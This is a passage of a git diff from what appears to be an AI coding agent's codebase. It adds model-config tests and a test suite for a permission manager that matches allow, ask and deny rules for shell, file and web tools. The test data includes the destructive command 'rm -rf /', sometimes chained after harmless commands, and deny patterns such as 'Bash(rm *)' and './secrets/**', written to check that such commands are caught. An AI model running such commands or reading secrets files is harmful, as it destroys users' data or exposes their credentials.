'./utils/request-tokenizer/textTokenizer.js'; export * from './utils/retry.js'; export * from './utils/ripgrepUtils.js'; export * from './utils/schemaValidator.js'; @@ -247,3 +256,9 @@ export * from './test-utils/index.js'; export * from './hooks/types.js'; export { HookSystem, HookRegistry } from './hooks/index.js'; export type { HookRegistryEntry } from './hooks/index.js'; + +// Export hook triggers for notification hooks +export { + fireNotificationHook, + type NotificationHookResult, +} from './core/toolHookTriggers.js'; diff --git a/packages/core/src/models/modelsConfig.test.ts b/packages/core/src/models/modelsConfig.test.ts index 25268aebe..87c8aaf34 100644 --- a/packages/core/src/models/modelsConfig.test.ts +++ b/packages/core/src/models/modelsConfig.test.ts @@ -1506,4 +1506,130 @@ describe('ModelsConfig', () => { expect(allModels.some((m) => m.id === 'gemini-ultra')).toBe(true); }); }); + + describe('max_tokens in modelsConfig', () => { + it('should not auto-fill max_tokens when samplingParams is undefined', async () => { + const modelProvidersConfig: ModelProvidersConfig = { + openai: [ + { + id: 'gpt-4', + name: 'GPT-4', + baseUrl: 'https://api.openai.example.com/v1', + // No generationConfig.samplingParams defined + }, + ], + }; + + const modelsConfig = new ModelsConfig({ + initialAuthType: AuthType.USE_OPENAI, + modelProvidersConfig, + }); + + await modelsConfig.switchModel(AuthType.USE_OPENAI, 'gpt-4'); + + const gc = currentGenerationConfig(modelsConfig); + expect(gc.samplingParams).toBeUndefined(); + }); + + it('should not auto-fill max_tokens when samplingParams exists but max_tokens is missing', async () => { + const modelProvidersConfig: ModelProvidersConfig = { + openai: [ + { + id: 'gpt-4', + name: 'GPT-4', + baseUrl: 'https://api.openai.example.com/v1', + generationConfig: { + samplingParams: { temperature: 0.7 }, // max_tokens not defined + }, + }, + ], + }; + + const modelsConfig = new ModelsConfig({ + initialAuthType: AuthType.USE_OPENAI, + modelProvidersConfig, + }); + + await modelsConfig.switchModel(AuthType.USE_OPENAI, 'gpt-4'); + + const gc = currentGenerationConfig(modelsConfig); + // Should preserve existing sampling params but not inject max_tokens + expect(gc.samplingParams?.temperature).toBe(0.7); + expect(gc.samplingParams?.max_tokens).toBeUndefined(); + + const sources = modelsConfig.getGenerationConfigSources(); + expect(sources['samplingParams']?.kind).toBe('modelProviders'); + }); + + it('should not override existing max_tokens from modelProviders', async () => { + const modelProvidersConfig: ModelProvidersConfig = { + openai: [ + { + id: 'gpt-4', + name: 'GPT-4', + baseUrl: 'https://api.openai.example.com/v1', + generationConfig: { + samplingParams: { temperature: 0.7, max_tokens: 4096 }, + }, + }, + ], + }; + + const modelsConfig = new ModelsConfig({ + initialAuthType: AuthType.USE_OPENAI, + modelProvidersConfig, + }); + + await modelsConfig.switchModel(AuthType.USE_OPENAI, 'gpt-4'); + + const gc = currentGenerationConfig(modelsConfig); + // Should preserve both values from provider + expect(gc.samplingParams?.temperature).toBe(0.7); + expect(gc.samplingParams?.max_tokens).toBe(4096); + + const sources = modelsConfig.getGenerationConfigSources(); + expect(sources['samplingParams']?.kind).toBe('modelProviders'); + }); + + it('should not auto-fill max_tokens for different model families', async () => { + const modelProvidersConfig: ModelProvidersConfig = { + anthropic: [ + { + id: 'claude-3-opus', + name: 'Claude 3 Opus', + baseUrl: 'https://api.anthropic.example.com/v1', + }, + ], + gemini: [ + { + id: 'gemini-pro', + name: 'Gemini Pro', + baseUrl: 'https://api.gemini.example.com/v1', + }, + ], + }; + + // Test Claude model without provider max_tokens + const claudeConfig = new ModelsConfig({ + initialAuthType: AuthType.USE_ANTHROPIC, + modelProvidersConfig, + }); + + await claudeConfig.switchModel(AuthType.USE_ANTHROPIC, 'claude-3-opus'); + + let gc = currentGenerationConfig(claudeConfig); + expect(gc.samplingParams).toBeUndefined(); + + // Test Gemini model without provider max_tokens + const geminiConfig = new ModelsConfig({ + initialAuthType: AuthType.USE_GEMINI, + modelProvidersConfig, + }); + + await geminiConfig.switchModel(AuthType.USE_GEMINI, 'gemini-pro'); + + gc = currentGenerationConfig(geminiConfig); + expect(gc.samplingParams).toBeUndefined(); + }); + }); }); diff --git a/packages/core/src/permissions/index.ts b/packages/core/src/permissions/index.ts new file mode 100644 index 000000000..f03062aa7 --- /dev/null +++ b/packages/core/src/permissions/index.ts @@ -0,0 +1,12 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +export * from './types.js'; +export * from './rule-parser.js'; +export { PermissionManager } from './permission-manager.js'; +export type { PermissionManagerConfig } from './permission-manager.js'; +export { extractShellOperations } from './shell-semantics.js'; +export type { ShellOperation } from './shell-semantics.js'; diff --git a/packages/core/src/permissions/permission-manager.test.ts b/packages/core/src/permissions/permission-manager.test.ts new file mode 100644 index 000000000..f7a312f1a --- /dev/null +++ b/packages/core/src/permissions/permission-manager.test.ts @@ -0,0 +1,1513 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, beforeEach } from 'vitest'; +import os from 'node:os'; +import { + parseRule, + parseRules, + matchesRule, + matchesCommandPattern, + matchesPathPattern, + matchesDomainPattern, + resolveToolName, + resolvePathPattern, + getSpecifierKind, + toolMatchesRuleToolName, + splitCompoundCommand, + buildPermissionRules, + getRuleDisplayName, +} from './rule-parser.js'; +import { PermissionManager } from './permission-manager.js'; +import type { PermissionManagerConfig } from './permission-manager.js'; + +// ─── resolveToolName ───────────────────────────────────────────────────────── + +describe('resolveToolName', () => { + it('resolves canonical names', () => { + expect(resolveToolName('run_shell_command')).toBe('run_shell_command'); + expect(resolveToolName('read_file')).toBe('read_file'); + }); + + it('resolves display-name aliases', () => { + expect(resolveToolName('Shell')).toBe('run_shell_command'); + expect(resolveToolName('ShellTool')).toBe('run_shell_command'); + expect(resolveToolName('Bash')).toBe('run_shell_command'); + expect(resolveToolName('ReadFile')).toBe('read_file'); + expect(resolveToolName('ReadFileTool')).toBe('read_file'); + expect(resolveToolName('EditTool')).toBe('edit'); + expect(resolveToolName('WriteFileTool')).toBe('write_file'); + }); + + it('resolves "Read" and "Edit" meta-categories', () => { + expect(resolveToolName('Read')).toBe('read_file'); + expect(resolveToolName('Edit')).toBe('edit'); + expect(resolveToolName('Write')).toBe('write_file'); + }); + + it('resolves Agent category', () => { + expect(resolveToolName('Agent')).toBe('task'); + }); + + it('returns unknown names unchanged', () => { + expect(resolveToolName('my_mcp_tool')).toBe('my_mcp_tool'); + expect(resolveToolName('mcp__server__tool')).toBe('mcp__server__tool'); + }); +}); + +// ─── getSpecifierKind ──────────────────────────────────────────────────────── + +describe('getSpecifierKind', () => { + it('returns "command" for shell tools', () => { + expect(getSpecifierKind('run_shell_command')).toBe('command'); + }); + + it('returns "path" for file read/edit tools', () => { + expect(getSpecifierKind('read_file')).toBe('path'); + expect(getSpecifierKind('edit')).toBe('path'); + expect(getSpecifierKind('write_file')).toBe('path'); + expect(getSpecifierKind('grep_search')).toBe('path'); + expect(getSpecifierKind('glob')).toBe('path'); + expect(getSpecifierKind('list_directory')).toBe('path'); + }); + + it('returns "domain" for web fetch tools', () => { + expect(getSpecifierKind('web_fetch')).toBe('domain'); + }); + + it('returns "literal" for other tools', () => { + expect(getSpecifierKind('Agent')).toBe('literal'); + expect(getSpecifierKind('task')).toBe('literal'); + expect(getSpecifierKind('mcp__server')).toBe('literal'); + }); +}); + +// ─── toolMatchesRuleToolName ───────────────────────────────────────────────── + +describe('toolMatchesRuleToolName', () => { + it('exact match', () => { + expect(toolMatchesRuleToolName('read_file', 'read_file')).toBe(true); + expect(toolMatchesRuleToolName('edit', 'edit')).toBe(true); + }); + + it('"Read" (read_file) covers grep_search, glob, list_directory', () => { + expect(toolMatchesRuleToolName('read_file', 'grep_search')).toBe(true); + expect(toolMatchesRuleToolName('read_file', 'glob')).toBe(true); + expect(toolMatchesRuleToolName('read_file', 'list_directory')).toBe(true); + }); + + it('"Edit" (edit) covers write_file', () => { + expect(toolMatchesRuleToolName('edit', 'write_file')).toBe(true); + }); + + it('does not cross categories', () => { + expect(toolMatchesRuleToolName('read_file', 'edit')).toBe(false); + expect(toolMatchesRuleToolName('edit', 'read_file')).toBe(false); + expect(toolMatchesRuleToolName('read_file', 'run_shell_command')).toBe( + false, + ); + }); +}); + +// ─── parseRule ─────────────────────────────────────────────────────────────── + +describe('parseRule', () => { + it('parses a simple tool name', () => { + const r = parseRule('ShellTool'); + expect(r.raw).toBe('ShellTool'); + expect(r.toolName).toBe('run_shell_command'); + expect(r.specifier).toBeUndefined(); + expect(r.specifierKind).toBeUndefined(); + }); + + it('parses Bash alias (Claude Code compat)', () => { + const r = parseRule('Bash'); + expect(r.toolName).toBe('run_shell_command'); + }); + + it('parses a shell tool with a specifier', () => { + const r = parseRule('Bash(git *)'); + expect(r.toolName).toBe('run_shell_command'); + expect(r.specifier).toBe('git *'); + expect(r.specifierKind).toBe('command'); + }); + + it('parses Read with path specifier', () => { + const r = parseRule('Read(./secrets/**)'); + expect(r.toolName).toBe('read_file'); + expect(r.specifier).toBe('./secrets/**'); + expect(r.specifierKind).toBe('path'); + }); + + it('parses Edit with path specifier', () => { + const r = parseRule('Edit(/src/**/*.ts)'); + expect(r.toolName).toBe('edit'); + expect(r.specifier).toBe('/src/**/*.ts'); + expect(r.specifierKind).toBe('path'); + }); + + it('parses WebFetch with domain specifier', () => { + const r = parseRule('WebFetch(domain:example.com)'); + expect(r.toolName).toBe('web_fetch'); + expect(r.specifier).toBe('domain:example.com'); + expect(r.specifierKind).toBe('domain'); + }); + + it('parses Agent with literal specifier', () => { + const r = parseRule('Agent(Explore)'); + expect(r.toolName).toBe('task'); + expect(r.specifier).toBe('Explore'); + expect(r.specifierKind).toBe('literal'); + }); + + it('handles unknown tools without specifier', () => { + const r = parseRule('mcp__my_server__my_tool'); + expect(r.toolName).toBe('mcp__my_server__my_tool'); + expect(r.specifier).toBeUndefined(); + }); + + it('handles legacy :* suffix (deprecated)', () => { + const r = parseRule('Bash(git:*)'); + expect(r.toolName).toBe('run_shell_command'); + expect(r.specifier).toBe('git *'); + }); + + it('handles malformed pattern (no closing paren)', () => { + const r = parseRule('Bash(git status'); + expect(r.specifier).toBeUndefined(); + }); +}); + +// ─── parseRules ────────────────────────────────────────────────────────────── + +describe('parseRules', () => { + it('filters empty strings', () => { + const rules = parseRules(['ShellTool', '', ' ', 'ReadFileTool']); + expect(rules).toHaveLength(2); + }); +}); + +// ─── matchesCommandPattern (Shell glob) ────────────────────────────────────── + +describe('matchesCommandPattern', () => { + // Basic prefix matching (no wildcards) + describe('prefix matching without glob', () => { + it('exact match', () => { + expect(matchesCommandPattern('git', 'git')).toBe(true); + }); + + it('prefix + space', () => { + expect(matchesCommandPattern('git', 'git status')).toBe(true); + expect(matchesCommandPattern('git commit', 'git commit -m "test"')).toBe( + true, + ); + }); + + it('does not match as substring', () => { + expect(matchesCommandPattern('git', 'gitcommit')).toBe(false); + }); + }); + + // Wildcard at tail + describe('wildcard at tail', () => { + it('matches any arguments', () => { + expect(matchesCommandPattern('git *', 'git status')).toBe(true); + expect(matchesCommandPattern('git *', 'git commit -m "test"')).toBe(true); + expect(matchesCommandPattern('npm run *', 'npm run build')).toBe(true); + }); + + it('space-star requires word boundary (ls * does not match lsof)', () => { + expect(matchesCommandPattern('ls *', 'ls -la')).toBe(true); + expect(matchesCommandPattern('ls *', 'lsof')).toBe(false); + }); + + it('no-space-star allows prefix matching (ls* matches lsof)', () => { + expect(matchesCommandPattern('ls*', 'ls -la')).toBe(true); + expect(matchesCommandPattern('ls*', 'lsof')).toBe(true); + }); + + it('does not match different command', () => { + expect(matchesCommandPattern('git *', 'echo hello')).toBe(false); + }); + }); + + // Wildcard at head + describe('wildcard at head', () => { + it('matches any command ending with pattern', () => { + expect(matchesCommandPattern('* --version', 'node --version')).toBe(true); + expect(matchesCommandPattern('* --version', 'npm --version')).toBe(true); + expect(matchesCommandPattern('* --help *', 'npm --help install')).toBe( + true, + ); + }); + + it('does not match non-matching suffix', () => { + expect(matchesCommandPattern('* --version', 'node --help')).toBe(false); + }); + }); + + // Wildcard in middle + describe('wildcard in middle', () => { + it('matches middle segments', () => { + expect(matchesCommandPattern('git * main', 'git checkout main')).toBe( + true, + ); + expect(matchesCommandPattern('git * main', 'git merge main')).toBe(true); + }); + + it('does not match different suffix', () => { + expect(matchesCommandPattern('git * main', 'git checkout dev')).toBe( + false, + ); + }); + }); + + // Word boundary rule: space before * matters + describe('word boundary rule (space before *)', () => { + it('Bash(ls *): matches "ls -la" but NOT "lsof"', () => { + expect(matchesCommandPattern('ls *', 'ls -la')).toBe(true); + expect(matchesCommandPattern('ls *', 'ls')).toBe(true); // "ls" alone + expect(matchesCommandPattern('ls *', 'lsof')).toBe(false); + }); + + it('Bash(ls*): matches both "ls -la" and "lsof"', () => { + expect(matchesCommandPattern('ls*', 'ls -la')).toBe(true); + expect(matchesCommandPattern('ls*', 'lsof')).toBe(true); + expect(matchesCommandPattern('ls*', 'ls')).toBe(true); + }); + + it('Bash(npm *): matches "npm run" but NOT "npmx"', () => { + expect(matchesCommandPattern('npm *', 'npm run build')).toBe(true); + expect(matchesCommandPattern('npm *', 'npmx install')).toBe(false); + }); + }); + + // Shell operator awareness + // + // Key insight: operator boundary extraction means we only match against + // the FIRST simple command. So `git *` still matches `git status && rm -rf /` + // because the first command IS `git status` which matches `git *`. + // + // The safety benefit: a pattern like `rm *` would NOT match + // `git status && rm -rf /` because the first command is `git status`. + // matchesCommandPattern operates on simple commands only. + // Compound command splitting is handled by PermissionManager.evaluate(). + // These tests verify that matchesCommandPattern works correctly on + // individual simple commands (the sub-commands after splitting). + describe('simple command matching (no operators)', () => { + it('matches when no operators are present', () => { + expect( + matchesCommandPattern('git *', 'git commit -m "hello world"'), + ).toBe(true); + }); + + it('operators inside quotes are not boundaries for splitCompoundCommand', () => { + // "echo 'a && b'" → the && is inside quotes, not an operator + expect(matchesCommandPattern('echo *', "echo 'a && b'")).toBe(true); + }); + }); + + // Special: lone * matches any command + describe('lone wildcard', () => { + it('* matches any single command', () => { + expect(matchesCommandPattern('*', 'anything here')).toBe(true); + }); + }); + + // Exact command match with specifier + describe('exact command specifier', () => { + it('Bash(npm run build) matches exact command', () => { + expect(matchesCommandPattern('npm run build', 'npm run build')).toBe( + true, + ); + }); + it('Bash(npm run build) also matches with trailing args (prefix)', () => { + expect( + matchesCommandPattern('npm run build', 'npm run build --verbose'), + ).toBe(true); + }); + it('Bash(npm run build) does not match different command', () => { + expect(matchesCommandPattern('npm run build', 'npm run test')).toBe( + false, + ); + }); + }); +}); + +// ─── splitCompoundCommand ──────────────────────────────────────────────────── + +describe('splitCompoundCommand', () => { + it('simple command returns single-element array', () => { + expect(splitCompoundCommand('git status')).toEqual(['git status']); + }); + + it('splits on &&', () => { + expect(splitCompoundCommand('git status && rm -rf /')).toEqual([ + 'git status', + 'rm -rf /', + ]); + }); + + it('splits on ||', () => { + expect(splitCompoundCommand('git push || echo failed')).toEqual([ + 'git push', + 'echo failed', + ]); + }); + + it('splits on ;', () => { + expect(splitCompoundCommand('echo hello; echo world')).toEqual([ + 'echo hello', + 'echo world', + ]); + }); + + it('splits on |', () => { + expect(splitCompoundCommand('git log | grep fix')).toEqual([ + 'git log', + 'grep fix', + ]); + }); + + it('handles three-part compound', () => { + expect(splitCompoundCommand('a && b && c')).toEqual(['a', 'b', 'c']); + }); + + it('handles mixed operators', () => { + expect(splitCompoundCommand('a && b | c; d')).toEqual(['a', 'b', 'c', 'd']); + }); + + it('does not split on operators inside single quotes', () => { + expect(splitCompoundCommand("echo 'a && b'")).toEqual(["echo 'a && b'"]); + }); + + it('does not split on operators inside double quotes', () => { + expect(splitCompoundCommand('echo "a && b"')).toEqual(['echo "a && b"']); + }); + + it('handles escaped characters', () => { + expect(splitCompoundCommand('echo a \\&& b')).toEqual(['echo a \\&& b']); + }); + + it('trims whitespace around sub-commands', () => { + expect(splitCompoundCommand(' git status && rm -rf / ')).toEqual([ + 'git status', + 'rm -rf /', + ]); + }); +}); + +// ─── resolvePathPattern ────────────────────────────────────────────────────── + +describe('resolvePathPattern', () => { + const projectRoot = '/project'; + const cwd = '/project/subdir'; + + it('// prefix → absolute from filesystem root', () => { + expect( + resolvePathPattern('//Users/alice/secrets/**', projectRoot, cwd), + ).toBe('/Users/alice/secrets/**'); + }); + + it('~/ prefix → relative to home directory', () => { + const result = resolvePathPattern('~/Documents/*.pdf', projectRoot, cwd); + expect(result).toContain('Documents/*.pdf'); + // On POSIX systems the home dir starts with '/'; on Windows it may look like + // 'C:/Users/foo'. Either way, verify the result begins with the (normalized) + // home directory. + const normalizedHome = os.homedir().replace(/\\/g, '/'); + expect(result.startsWith(normalizedHome)).toBe(true); + }); + + it('/ prefix → relative to project root (NOT absolute)', () => { + expect(resolvePathPattern('/src/**/*.ts', projectRoot, cwd)).toBe( + '/project/src/**/*.ts', + ); + }); + + it('./ prefix → relative to cwd', () => { + expect(resolvePathPattern('./secrets/**', projectRoot, cwd)).toBe( + '/project/subdir/secrets/**', + ); + }); + + it('no prefix → relative to cwd', () => { + expect(resolvePathPattern('*.env', projectRoot, cwd)).toBe( + '/project/subdir/*.env', + ); + }); + + it('/Users/alice/file is relative to project root, NOT absolute', () => { + // This is a gotcha from the Claude Code docs + expect(resolvePathPattern('/Users/alice/file', projectRoot, cwd)).toBe( + '/project/Users/alice/file', + ); + }); +}); + +// ─── matchesPathPattern ────────────────────────────────────────────────────── + +describe('matchesPathPattern', () => { + const projectRoot = '/project'; + const cwd = '/project'; + + it('matches dotfiles (e.g. .env)', () => { + expect(matchesPathPattern('.env', '/project/.env', projectRoot, cwd)).toBe( + true, + ); + expect(matchesPathPattern('*.env', '/project/.env', projectRoot, cwd)).toBe( + true, + ); + }); + + it('** matches recursively across directories', () => { + expect( + matchesPathPattern( + './secrets/**', + '/project/secrets/deep/nested/file.txt', + projectRoot, + cwd, + ), + ).toBe(true); + }); + + it('* matches single directory only', () => { + expect( + matchesPathPattern( + '/src/*.ts', + '/project/src/index.ts', + projectRoot, + cwd, + ), + ).toBe(true); + expect( + matchesPathPattern( + '/src/*.ts', + '/project/src/nested/index.ts', + projectRoot, + cwd, + ), + ).toBe(false); + }); + + it('/docs/** matches under project root docs', () => { + expect( + matchesPathPattern( + '/docs/**', + '/project/docs/readme.md', + projectRoot, + cwd, + ), + ).toBe(true); + expect( + matchesPathPattern( + '/docs/**', + '/project/src/docs/readme.md', + projectRoot, + cwd, + ), + ).toBe(false); + }); + + it('//tmp/scratch.txt matches absolute path', () => { + expect( + matchesPathPattern( + '//tmp/scratch.txt', + '/tmp/scratch.txt', + projectRoot, + cwd, + ), + ).toBe(true); + }); + + it('does not match unrelated paths', () => { + expect( + matchesPathPattern( + './secrets/**', + '/project/public/index.html', + projectRoot, + cwd, + ), + ).toBe(false); + }); +}); + +// ─── matchesDomainPattern ──────────────────────────────────────────────────── + +describe('matchesDomainPattern', () => { + it('matches exact domain', () => { + expect(matchesDomainPattern('domain:example.com', 'example.com')).toBe( + true, + ); + }); + + it('matches subdomain', () => { + expect(matchesDomainPattern('domain:example.com', 'sub.example.com')).toBe( + true, + ); + expect( + matchesDomainPattern('domain:example.com', 'deep.sub.example.com'), + ).toBe(true); + }); + + it('does not match different domain', () => { + expect(matchesDomainPattern('domain:example.com', 'notexample.com')).toBe( + false, + ); + }); + + it('is case-insensitive', () => { + expect(matchesDomainPattern('domain:Example.COM', 'example.com')).toBe( + true, + ); + }); + + it('handles missing prefix', () => { + expect(matchesDomainPattern('example.com', 'example.com')).toBe(true); + }); +}); + +// ─── matchesRule (unified) ─────────────────────────────────────────────────── + +describe('matchesRule', () => { + // Basic tool name matching + it('simple tool-name rule matches any invocation', () => { + const rule = parseRule('ShellTool'); + expect(matchesRule(rule, 'run_shell_command')).toBe(true); + expect(matchesRule(rule, 'run_shell_command', 'git status')).toBe(true); + }); + + it('does not match a different tool', () => { + const rule = parseRule('ShellTool'); + expect(matchesRule(rule, 'read_file')).toBe(false); + }); + + // Shell command specifier + it('specifier rule requires a command for shell tools', () => { + const rule = parseRule('Bash(git *)'); + expect(matchesRule(rule, 'run_shell_command')).toBe(false); // no command + expect(matchesRule(rule, 'run_shell_command', 'git status')).toBe(true); + expect(matchesRule(rule, 'run_shell_command', 'echo hello')).toBe(false); + }); + + it('matchesRule checks individual simple commands (compound splitting is at PM level)', () => { + const rule = parseRule('Bash(git *)'); + // matchesRule receives a simple command (already split by PM) + expect(matchesRule(rule, 'run_shell_command', 'git status')).toBe(true); + expect(matchesRule(rule, 'run_shell_command', 'rm -rf /')).toBe(false); + }); + + // Meta-category matching: Read + it('Read rule matches grep_search, glob, list_directory', () => { + const rule = parseRule('Read'); + expect(matchesRule(rule, 'read_file')).toBe(true); + expect(matchesRule(rule, 'grep_search')).toBe(true); + expect(matchesRule(rule, 'glob')).toBe(true); + expect(matchesRule(rule, 'list_directory')).toBe(true); + expect(matchesRule(rule, 'edit')).toBe(false); // not a read tool + }); + + // Meta-category matching: Edit + it('Edit rule matches edit and write_file', () => { + const rule = parseRule('Edit'); + expect(matchesRule(rule, 'edit')).toBe(true); + expect(matchesRule(rule, 'write_file')).toBe(true); + expect(matchesRule(rule, 'read_file')).toBe(false); // not an edit tool + }); + + // File path matching + it('Read with path specifier requires filePath', () => { + const rule = parseRule('Read(.env)'); + const pathCtx = { projectRoot: '/project', cwd: '/project' }; + // No filePath → no match + expect(matchesRule(rule, 'read_file')).toBe(false); + // With filePath + expect( + matchesRule( + rule, + 'read_file', + undefined, + '/project/.env', + undefined, + pathCtx, + ), + ).toBe(true); + expect( + matchesRule( + rule, + 'read_file', + undefined, + '/project/other.txt', + undefined, + pathCtx, + ), + ).toBe(false); + }); + + it('Edit path specifier matches write_file too', () => { + const rule = parseRule('Edit(/src/**/*.ts)'); + const pathCtx = { projectRoot: '/project', cwd: '/project' }; + expect( + matchesRule( + rule, + 'write_file', + undefined, + '/project/src/index.ts', + undefined, + pathCtx, + ), + ).toBe(true); + expect( + matchesRule( + rule, + 'write_file', + undefined, + '/project/docs/readme.md', + undefined, + pathCtx, + ), + ).toBe(false); + }); + + // WebFetch domain matching + it('WebFetch domain specifier', () => { + const rule = parseRule('WebFetch(domain:example.com)'); + expect( + matchesRule(rule, 'web_fetch', undefined, undefined, 'example.com'), + ).toBe(true); + expect( + matchesRule(rule, 'web_fetch', undefined, undefined, 'sub.example.com'), + ).toBe(true); + expect( + matchesRule(rule, 'web_fetch', undefined, undefined, 'other.com'), + ).toBe(false); + // No domain → no match + expect(matchesRule(rule, 'web_fetch')).toBe(false); + }); + + // Agent literal matching + it('Agent literal specifier', () => { + const rule = parseRule('Agent(Explore)'); + // Agent is an alias for 'task'; specifier matches via the specifier field + expect( + matchesRule( + rule, + 'task', + undefined, + undefined, + undefined, + undefined, + 'Explore', + ), + ).toBe(true); + expect( + matchesRule( + rule, + 'task', + undefined, + undefined, + undefined, + undefined, + 'Plan', + ), + ).toBe(false); + expect(matchesRule(rule, 'task')).toBe(false); // no specifier + }); + + // MCP tool matching + it('MCP tool exact match', () => { + const rule = parseRule('mcp__puppeteer__puppeteer_navigate'); + expect(matchesRule(rule, 'mcp__puppeteer__puppeteer_navigate')).toBe(true); + expect(matchesRule(rule, 'mcp__puppeteer__puppeteer_click')).toBe(false); + }); + + it('MCP server-level match (2-part pattern)', () => { + const rule = parseRule('mcp__puppeteer'); + expect(matchesRule(rule, 'mcp__puppeteer__puppeteer_navigate')).toBe(true); + expect(matchesRule(rule, 'mcp__puppeteer__puppeteer_click')).toBe(true); + expect(matchesRule(rule, 'mcp__other__tool')).toBe(false); + }); + + it('MCP wildcard match', () => { + const rule = parseRule('mcp__puppeteer__*'); + expect(matchesRule(rule, 'mcp__puppeteer__puppeteer_navigate')).toBe(true); + expect(matchesRule(rule, 'mcp__other__tool')).toBe(false); + }); + + it('MCP intra-segment wildcard match (e.g. mcp__chrome__use_*)', () => { + const rule = parseRule('mcp__chrome__use_*'); + expect(matchesRule(rule, 'mcp__chrome__use_browser')).toBe(true); + expect(matchesRule(rule, 'mcp__chrome__use_context')).toBe(true); + expect(matchesRule(rule, 'mcp__chrome__navigate')).toBe(false); + expect(matchesRule(rule, 'mcp__other__use_browser')).toBe(false); + }); +}); + +// ─── PermissionManager ────────────────────────────────────────────────────── + +function makeConfig( + opts: Partial<{ + permissionsAllow: string[]; + permissionsAsk: string[]; + permissionsDeny: string[]; + coreTools: string[]; + projectRoot: string; + cwd: string; + }> = {}, +): PermissionManagerConfig { + return { + getPermissionsAllow: () => opts.permissionsAllow, + getPermissionsAsk: () => opts.permissionsAsk, + getPermissionsDeny: () => opts.permissionsDeny, + getCoreTools: () => opts.coreTools, + getProjectRoot: () => opts.projectRoot ?? '/project', + getCwd: () => opts.cwd ?? '/project', + }; +} + +describe('PermissionManager', () => { + let pm: PermissionManager; + + describe('basic rule evaluation', () => { + beforeEach(() => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['ReadFileTool', 'Bash(git *)'], + permissionsAsk: ['WriteFileTool'], + permissionsDeny: ['ShellTool'], + }), + ); + pm.initialize(); + }); + + it('returns deny for a denied tool', () => { + expect(pm.evaluate({ toolName: 'run_shell_command' })).toBe('deny'); + }); + + it('returns ask for an ask-rule tool', () => { + expect(pm.evaluate({ toolName: 'write_file' })).toBe('ask'); + }); + + it('returns allow for an allow-rule tool', () => { + expect(pm.evaluate({ toolName: 'read_file' })).toBe('allow'); + }); + + it('returns default for unmatched tool', () => { + // Note: 'glob' is covered by ReadFileTool via Read meta-category, + // so use a tool not in any rule or meta-category + expect(pm.evaluate({ toolName: 'task' })).toBe('default'); + }); + + it('deny takes precedence over ask and allow', () => { + const pm2 = new PermissionManager( + makeConfig({ + permissionsAllow: ['run_shell_command'], + permissionsAsk: ['run_shell_command'], + permissionsDeny: ['run_shell_command'], + }), + ); + pm2.initialize(); + expect(pm2.evaluate({ toolName: 'run_shell_command' })).toBe('deny'); + }); + + it('ask takes precedence over allow', () => { + const pm2 = new PermissionManager( + makeConfig({ + permissionsAllow: ['write_file'], + permissionsAsk: ['write_file'], + }), + ); + pm2.initialize(); + expect(pm2.evaluate({ toolName: 'write_file' })).toBe('ask'); + }); + }); + + describe('command-level evaluation', () => { + beforeEach(() => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(git *)'], + permissionsDeny: ['Bash(rm *)'], + }), + ); + pm.initialize(); + }); + + it('allows a matching allowed command', () => { + expect( + pm.evaluate({ toolName: 'run_shell_command', command: 'git status' }), + ).toBe('allow'); + }); + + it('denies a matching denied command', () => { + expect( + pm.evaluate({ toolName: 'run_shell_command', command: 'rm -rf /' }), + ).toBe('deny'); + }); + + it('returns default for an unmatched command', () => { + expect( + pm.evaluate({ toolName: 'run_shell_command', command: 'echo hello' }), + ).toBe('default'); + }); + + it('isCommandAllowed delegates to evaluate', () => { + expect(pm.isCommandAllowed('git commit')).toBe('allow'); + expect(pm.isCommandAllowed('rm -rf /')).toBe('deny'); + expect(pm.isCommandAllowed('ls')).toBe('default'); + }); + }); + + describe('compound command evaluation', () => { + it('all sub-commands allowed → allow', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(safe-cmd *)', 'Bash(one-cmd *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'safe-cmd arg1 && one-cmd arg2', + }), + ).toBe('allow'); + }); + + it('one sub-command unmatched → default (most restrictive)', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(safe-cmd *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'safe-cmd && two-cmd', + }), + ).toBe('default'); + }); + + it('one sub-command denied → deny', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(safe-cmd *)'], + permissionsDeny: ['Bash(evil-cmd *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'safe-cmd && evil-cmd rm-all', + }), + ).toBe('deny'); + }); + + it('one sub-command ask + one allow → ask', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(git *)'], + permissionsAsk: ['Bash(npm *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'git status && npm publish', + }), + ).toBe('ask'); + }); + + it('pipe compound: all matched → allow', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(git *)', 'Bash(grep *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'git log | grep fix', + }), + ).toBe('allow'); + }); + + it('pipe compound: second unmatched → default', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(git *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'git log | grep fix', + }), + ).toBe('default'); + }); + + it('semicolon compound: deny in second → deny', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(echo *)'], + permissionsDeny: ['Bash(rm *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'echo hello; rm -rf /', + }), + ).toBe('deny'); + }); + + it('|| compound: all allowed → allow', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(git *)', 'Bash(echo *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'git push || echo failed', + }), + ).toBe('allow'); + }); + + it('operators inside quotes: treated as single command', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(echo *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: "echo 'a && b'", + }), + ).toBe('allow'); + }); + + 